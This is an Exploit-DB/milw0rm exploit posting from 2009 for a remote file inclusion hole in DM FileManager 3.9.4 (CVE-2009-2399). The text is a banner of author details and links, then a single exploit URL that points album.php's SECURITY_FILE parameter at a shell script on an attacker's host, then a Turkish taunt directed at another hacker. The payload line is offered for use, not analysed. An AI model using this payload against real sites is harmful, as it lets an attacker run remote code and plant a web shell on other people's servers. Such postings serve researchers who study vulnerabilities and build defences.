dm filemanager 3.9.4 - Remote File Inclusion Vulnerability



EDB-ID: 9044 CVE: 2009-2399 OSVDB-ID: 55470
Author: Septemb0x Published: 2009-06-29 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
#############################################################################################
[+] DM FileManager 3.9.4 Remote File Include Vulnerability
[+] Author : Septemb0x
[+] www.Cyber-Warrior.Org - Information Technology's World
[+] Greetz : BARCOD3 And All Friends...
[+] Dork : Yok Dork Mork :D
[+] Download Script : http://uploaded.to/file/3z84ie
[+] Product Site : http://www.dutchmonkey.com
#############################################################################################
[+] EXPLOIT;
[+] http://[sitename]/[path]/dm-albums/template/album.php?SECURITY_FILE=http://attackersite/shell.php
#############################################################################################
< ---- Note ---- >
H....R;
Sen çok üstün zekaya sahip birisin,
emin olbilirsin, :D
Sql injection ile domain hackleyebilen tek lamersin, :D
ASP'de Rfi Bulmakta Birebirsin,
Ama Gördüğüm En hıyar Lamersin :D
Bu Kafiyelerde Bi Tarafına Girsin ;)
Lol H....R :D
< ---- Note Finished ---- >

# milw0rm.com [2009-06-29]